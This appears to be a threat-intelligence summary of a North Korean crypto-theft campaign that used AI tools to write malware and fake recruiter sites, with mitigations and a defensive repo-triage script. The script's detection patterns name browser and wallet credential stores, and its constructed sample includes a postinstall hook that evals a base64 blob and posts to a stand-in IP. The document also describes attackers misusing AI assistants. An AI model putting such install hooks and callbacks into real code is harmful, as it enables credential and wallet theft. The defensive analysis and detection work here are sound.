Full Report
One group of hackers used AI for everything from vibe coding their malware to creating fake company websites—and stole as much as $12 million in three months.
Analysis Summary
# Threat Actor: HexagonalRodent
## Attribution & Identity
* **Identification:** North Korean state-sponsored cybercrime group.
* **Name:** HexagonalRodent (designation assigned by Expel, which published the analysis).
* **Associations:** Linked to known North Korean state hacking operations through shared command-and-control (C2) infrastructure.
* **Operator Profile:** Characterized as "mediocre" or "unskilled" operators who, without AI assistance, lack the ability to write complex code or run sophisticated infrastructure on their own.
## Activity Summary
Between early 2026 and April 2026, HexagonalRodent ran a high-volume, AI-enabled campaign against the cryptocurrency and Web3 sectors. Using an approach the report calls "vibe coding," the group relied on commercial AI tools to generate both its malware and its phishing infrastructure. The operation compromised over 2,000 computers and is estimated to have stolen as much as $12 million in cryptocurrency over roughly three months; that figure is an upper bound, not a confirmed total.
## Tactics, Techniques & Procedures
* **AI-Enabled Development ("Vibe Coding"):** Used Large Language Models (LLMs) to write credential-stealing malware and build deceptive company websites.
* **Social Engineering:** Posed as recruiters offering fraudulent job opportunities at tech firms.
* **Malware Delivery:** Victims were told to download and run a "coding assignment" as part of a technical interview; the assignment carried the embedded malware, so the payload executed on the developer's own workstation.
* **Credential Theft:** The payload targeted browser-stored credentials and the private keys of cryptocurrency wallets on the infected host.
* **Operational Insecurity:** The group left its own infrastructure unsecured, exposing the prompts it fed to AI tools along with databases of victim data, which is how investigators reconstructed the workflow.
* **Code Characteristics:** The AI-generated code carried heavy English-language comments and, unusually for malware, emojis inside the source.
## Targeting
* **Sectors:** Cryptocurrency, Non-Fungible Tokens (NFTs), and Web3 projects.
* **Geography:** Global (targeting individuals based on industry role rather than region).
* **Victims:** Developers, engineers, and creators working on small-scale cryptocurrency launches and Web3 startups, i.e. people likely to hold wallet keys on the machine they code on.
## Tools & Infrastructure
* **AI Tools Used:** OpenAI (ChatGPT), Cursor, and Anima.
* **Malware:** Generic credential-stealing payloads; no family name has been assigned.
* **Infrastructure:**
* Fake recruitment and company websites built with AI tools.
* Command-and-Control (C2) servers previously associated with North Korean operations.
* No specific domains, IP addresses, or file hashes are published in this summary; the recruitment sites are described only by their role in the scheme, so treat any "example" domain as a placeholder rather than an observed indicator.
## Implications
HexagonalRodent illustrates how AI tools lower the barrier to entry for state-sponsored actors: operators with little development skill can now run broad, profitable campaigns by having LLMs produce the malware and the social-engineering lures. The current output is still detectable by standard EDR (Endpoint Detection and Response) tooling, but the speed at which these operators can regenerate and retarget code strains defense cycles built around slower-moving, hand-written tooling.
## Mitigations
* **Code Review & Verification:** Treat any third-party "test" code or interview assignment as untrusted: read it before running it, watch for install-time hooks and obfuscated blobs, and execute it only in an isolated, network-restricted sandbox rather than on a workstation that holds wallet keys or saved browser sessions.
* **Hardware Security Keys and Wallets:** Keep wallet signing keys in a hardware wallet so they never exist as files the malware can read, and protect exchange, email, and source-control accounts with FIDO2 hardware tokens (e.g., YubiKeys) so stolen browser passwords alone are not enough to log in.
* **Endpoint Detection (EDR):** Deploy and maintain updated EDR; the AI-generated malware seen so far follows standard, detectable behavioral patterns such as reading browser credential stores and wallet files.
* **Vetting Recruitment:** Verify the recruiter's identity and the legitimacy of the company domain through a secondary channel (the company's official site or a known employee) before downloading any attachments or cloning any repository.
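A practical form of the first mitigation is to triage an assignment before opening it in an IDE, because npm lifecycle hooks such as `postinstall` run as soon as a developer types `npm install`. The script below is an added example written for this summary, not code from Expel's report or the article it summarises. Its heuristics are assumptions drawn from the TTPs described above (payloads hidden in interview repos, browser and wallet credential theft, emoji-laden AI-generated source): install-time hooks, dynamic evaluation, long base64 blobs, process spawning, hard-coded IP addresses, references to browser or wallet credential stores, and emoji density. The sample assignment is constructed inline; the indicator names, weights, and the 0x2600 emoji threshold are arbitrary choices, and a hit means "open only in a sandbox", not "confirmed malicious".

```python
"""Triage an untrusted "coding assignment" repo before running it.

Added example, not code from the report or the article. The indicators and
weights below are assumptions derived from the campaign's described TTPs,
not published IOCs; a high score means "sandbox only", not "malicious".
"""
import json
import re
import unicodedata
from pathlib import Path

# Assumed risk indicators (not published IOCs from the campaign).
PATTERNS = {
    "dynamic_eval": re.compile(r"\b(?:eval|exec)\s*\(|new\s+Function\s*\("),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
    "process_spawn": re.compile(r"child_process|subprocess\.|os\.system|execSync"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "browser_or_wallet_store": re.compile(
        r"Login Data|Local Extension Settings|\.metamask|wallet\.dat|Cookies", re.I),
}
# npm hooks that execute during `npm install`, before anyone reads the code.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}
WEIGHTS = {"lifecycle_hook": 3, "dynamic_eval": 3, "long_base64": 2,
           "process_spawn": 2, "raw_ip_url": 2,
           "browser_or_wallet_store": 4, "emoji_chars": 1}


def is_emoji(ch):
    # Assumed heuristic: "other symbol" code points from U+2600 upward,
    # which covers glyphs like a check mark or a rocket used in AI comments.
    return ord(ch) >= 0x2600 and unicodedata.category(ch) == "So"


def scan_source(text):
    """Return {indicator: count} for one source file (only non-zero counts)."""
    hits = {name: len(rx.findall(text)) for name, rx in PATTERNS.items()}
    hits["emoji_chars"] = sum(is_emoji(ch) for ch in text)
    return {k: v for k, v in hits.items() if v}


def scan_package_json(text):
    """Return {hook_name: command} for install-time lifecycle scripts."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return {}
    return {k: v for k, v in scripts.items() if k in NPM_LIFECYCLE}


def triage(files):
    """files: {relative_path: text}. Returns score, verdict and per-file findings."""
    findings, score = {}, 0
    for rel, text in files.items():
        p = Path(rel)
        if p.name == "package.json":
            hooks = scan_package_json(text)
            if hooks:
                findings[rel] = {"lifecycle_hook": hooks}
                score += WEIGHTS["lifecycle_hook"] * len(hooks)
            continue
        if p.suffix not in SOURCE_SUFFIXES:
            continue
        hits = scan_source(text)
        if hits:
            findings[rel] = hits
            # Cap each indicator at 3 so one noisy file cannot dominate.
            score += sum(WEIGHTS[k] * min(v, 3) for k, v in hits.items())
    verdict = "sandbox-only" if score >= 5 else "review" if score else "clean"
    return {"score": score, "verdict": verdict, "findings": findings}


def triage_dir(root):
    """Read a real assignment directory (skipping node_modules) into triage()."""
    root = Path(root)
    files = {}
    for p in root.rglob("*"):
        if p.is_file() and "node_modules" not in p.parts and p.stat().st_size < 2_000_000:
            files[str(p.relative_to(root))] = p.read_text(errors="replace")
    return triage(files)


# Constructed sample assignment; not material from the campaign.
SAMPLE = {
    "package.json": json.dumps({
        "name": "trading-bot-assignment",
        "scripts": {"test": "jest", "postinstall": "node lib/setup.js"},
    }),
    "lib/setup.js": (
        "// 🚀 Bootstraps the environment ✅\n"
        "const cp = require('child_process');\n"
        "const blob = '" + "QUJD" * 40 + "';\n"
        "eval(Buffer.from(blob, 'base64').toString());\n"
        "fetch('http://203.0.113.7/c', {method: 'POST'});\n"
    ),
    "src/index.js": "export const add = (a, b) => a + b;\n",
    "README.md": "Implement the order book. 🚀\n",
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run `triage_dir("/path/to/cloned-assignment")` on a real repo; on the constructed sample the `postinstall` hook plus the `eval` of a base64 blob and the raw-IP callback push the score well past the sandbox threshold, while the benign `src/index.js` produces no findings. The scoring is deliberately coarse: its job is to decide where the code gets opened, not to replace EDR or a manual read of anything it flags.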